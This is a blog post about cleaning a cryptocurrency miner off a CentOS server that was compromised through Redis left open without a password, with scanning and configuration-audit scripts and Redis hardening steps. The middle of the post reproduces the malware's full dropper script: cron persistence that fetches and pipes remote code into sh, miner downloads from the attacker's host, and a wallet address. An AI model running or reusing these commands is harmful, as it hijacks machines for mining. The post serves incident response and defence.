While writing a program I noticed Redis behaving abnormally and the program starting extremely slowly. Checking with top, CPU usage was close to 100%.

Cause: Redis had been installed and started on CentOS without any access control. This is very dangerous: the Redis unauthorized-access flaw can easily lead to the system being compromised. Sebug has published the detailed vulnerability information for this flaw.

Vulnerability details: blog.jobbole.com/94518/

Best solution, from a question on Security Stack Exchange: http://security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance

I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script –
- On monkeyoto's suggestion, I blocked all communication with the mining pool server – iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
- Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
- Removed the directory /opt/yam.
- Removed /root/.ssh/KHK75NEOiq.
- Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
- Stopped the minerd process – pkill minerd.
- Stopped lady – service lady stop.

I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 | sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen. I still need to figure out how it gained access into the system but I was able to disable it this way.
First of all, stay calm. Shut down your Redis first. Run ps -ef | grep AnXqV to find the process and kill it. You will then discover that this achieves nothing: after a short while the malware starts itself again. At that point I ran crontab -l to inspect the scheduled tasks and found

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh

which is the cron job that keeps relaunching it. Delete all scheduled tasks with crontab -r, then remove the intrusion entry from /var/spool/cron/crontabs/root.

Full cleanup commands (this intrusion code may change at any time):

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
crontab -r   # if you have other cron jobs of your own, do not use this command; edit the crontab and delete only the intrusion line
vi /var/spool/cron/crontabs/root   # delete the intrusion line, then :wq
service lady stop
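The cleanup above is a one-off manual pass. The script below is an added example (shell; not from the original post or the Stack Exchange answer) that turns the post's indicators into a repeatable check: a grep for cron entries that download something and pipe it straight into a shell, generalised beyond the single URL shown so that a changed host or path is still caught, and a scan of a process listing for the process and file names the post cites. The crontab text and the ps output are constructed samples; on a live host you pass in the real files and the real ps output as shown in the trailing comment.

```shell
#!/bin/sh
# Added example, not from the original post: scan crontab text for the
# "fetch over the network and pipe into a shell" pattern this miner uses for
# persistence, and check a process listing for the indicator names the post
# mentions. The crontab and ps text below are constructed samples.

# Constructed sample crontab: two ordinary jobs plus the two entries from the post.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh
30 2 * * 0 /usr/sbin/logrotate /etc/logrotate.conf'

# Constructed sample of `ps auxf` output. The wallet string is a placeholder.
SAMPLE_PS='USER PID %CPU COMMAND
root 1 0.0 /sbin/init
root 1754 0.3 ./redis-server ./redis.conf
root 2201 97.8 /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u <wallet> -p x
root 2205 0.0 /tmp/AnXqV.yam -c x -M stratum+tcp://<wallet>:x@xmr.crypto-pool.fr:443/xmr
root 2301 0.0 grep minerd'

# Process and file names the post associates with this particular miner.
IOC_NAMES='AnXqV minerd KHK75NEOiq yam lady ddg.219'

# Print every cron line that downloads with curl/wget and pipes into sh or bash.
# The pattern is generic, so a different host or URL is still reported.
suspicious_cron_lines() {
    printf '%s\n' "$1" | grep -Ei '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Number of such lines; wc -l rather than grep -c so that zero matches yields "0".
count_suspicious_cron() {
    suspicious_cron_lines "$1" | wc -l | tr -d ' '
}

# Print each indicator name present in a process listing ($1), dropping the
# grep process itself exactly as the post's `ps auxf | grep -v grep` does.
match_iocs_in_listing() {
    for name in $IOC_NAMES; do
        printf '%s\n' "$1" | grep -v grep | grep -Fq "$name" && echo "$name"
    done
    return 0
}

count_iocs_in_listing() {
    match_iocs_in_listing "$1" | wc -l | tr -d ' '
}

echo "suspicious cron lines: $(count_suspicious_cron "$SAMPLE_CRONTAB")"
suspicious_cron_lines "$SAMPLE_CRONTAB"
echo "indicator names in process listing: $(count_iocs_in_listing "$SAMPLE_PS")"
match_iocs_in_listing "$SAMPLE_PS"

# On a live host, feed the real data instead of the samples, for example:
#   count_suspicious_cron "$(cat /var/spool/cron/root /var/spool/cron/crontabs/root 2>/dev/null)"
#   match_iocs_in_listing "$(ps auxf)"
```

The cron check is deliberately broader than the two exact lines the post shows, since the post itself warns that the intrusion code may change at any time; a match is a lead to inspect, not proof on its own.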
At this point the malware's shell script is easy to find. Its contents:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.219" ]; then
curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.219
fi
chmod +x /tmp/ddg.219 && /tmp/ddg.219
CleanTail()
{
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}
DoYam()
{
if [ ! -f "/tmp/AnXqV.yam" ]; then
curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
fi
chmod +x /tmp/AnXqV.yam
/tmp/AnXqV.yam -c x -M stratum+tcp://47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54:x@xmr.crypto-pool.fr:443/xmr
}
DoMiner()
{
if [ ! -f "/tmp/AnXqV" ]; then
curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
fi
chmod +x /tmp/AnXqV
/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54 -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB+01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
ps auxf|grep -v grep|grep "AnXqV" || DoYam
This malware did not actually cripple my system; keeping an eye on memory usage, the situation was fairly optimistic. Next, the Redis backdoor has to be fixed: the cleanup above treats the symptom, not the cause, unless you stop using Redis altogether.

Redis configuration

1. Set an auth password and change the port number. Enter the Redis installation directory:

cd /home/redis-2.8.17/src/
vi redis.conf
###
port 110
requirepass mypassword
###
:wq
./redis-server ./redis.conf &
When you use the ./redis-cli console, authenticate first; if you changed the port number, connect with the -p option. Then run auth mypassword.

Redis configuration reference: http://www.runoob.com/redis/redis-conf.html

Startup output from redis-server (ASCII logo not reproduced):
Redis 2.8.17 (00000000/0) 64 bit
Running in stand alone mode
Port: 110
PID: 1754
http://redis.io
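As an added example (shell; not from the original post), the script below audits a redis.conf for the settings that made this exposure possible, so the fix can be verified rather than assumed. It checks for a missing requirepass, for listening on every interface (no bind directive, or bind 0.0.0.0), for the default port 6379, and for the CONFIG command being left callable, which is what lets any client change dir and dbfilename and so turn open access into writes on disk. The bind and rename-command directives are standard Redis options but go beyond what the post sets; protected-mode is left out because it only exists from Redis 3.2 onward and the post runs 2.8.17. The three configuration texts (a stock install, the post's own fix, and a hardened variant with a placeholder password) are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original post: audit redis.conf text for the
# settings behind the unauthenticated-access exposure. Constructed inputs below.

# Constructed: effective settings of a stock install started without edits.
WEAK_CONF='daemonize no
port 6379
timeout 0
databases 16
dir ./'

# The fix from the post: a non-default port plus a password.
POST_CONF='daemonize no
port 110
requirepass mypassword
dir ./'

# Hardened: additionally bind to loopback and disable CONFIG.
# bind and rename-command exist in Redis 2.8; the password is a placeholder.
HARDENED_CONF='daemonize no
bind 127.0.0.1
port 110
requirepass CHANGE-ME-long-random-password
rename-command CONFIG ""
dir /var/lib/redis'

# Emit one finding per line for the conf text passed as $1.
audit_redis_conf() {
    # Keep only active directives: drop comment and blank lines.
    active=$(printf '%s\n' "$1" | grep -Ev '^[[:space:]]*(#|$)')

    printf '%s\n' "$active" | grep -Eq '^[[:space:]]*requirepass[[:space:]]+[^[:space:]]+' \
        || echo "no requirepass: anyone who can reach the port has full access"

    # Redis listens on all interfaces when bind is absent or set to a wildcard.
    bind_val=$(printf '%s\n' "$active" | awk '$1 == "bind" { print $2; exit }')
    case "$bind_val" in
        "")           echo "no bind directive: Redis listens on every interface" ;;
        0.0.0.0|::|\*) echo "bind $bind_val: Redis listens on every interface" ;;
    esac

    # Missing port means the default 6379.
    port_val=$(printf '%s\n' "$active" | awk '$1 == "port" { print $2; exit }')
    [ "${port_val:-6379}" != "6379" ] \
        || echo "default port 6379: trivially located by internet-wide scans"

    printf '%s\n' "$active" | grep -Eq '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' \
        || echo "CONFIG command enabled: dir and dbfilename can be changed by any client"
    return 0
}

# Count of findings, for scripted checks; 0 means all four controls are in place.
count_findings() {
    audit_redis_conf "$1" | wc -l | tr -d ' '
}

echo "== stock install =="
audit_redis_conf "$WEAK_CONF"
echo "== after the fix in the post =="
audit_redis_conf "$POST_CONF"
echo "== hardened =="
audit_redis_conf "$HARDENED_CONF"

# On a live host: audit_redis_conf "$(cat /home/redis-2.8.17/src/redis.conf)"
```

Run against the post's own configuration the audit still reports two findings (no bind directive, CONFIG callable), which is the point: a password and a moved port stop casual access, but binding to loopback and renaming CONFIG close the path that was actually used.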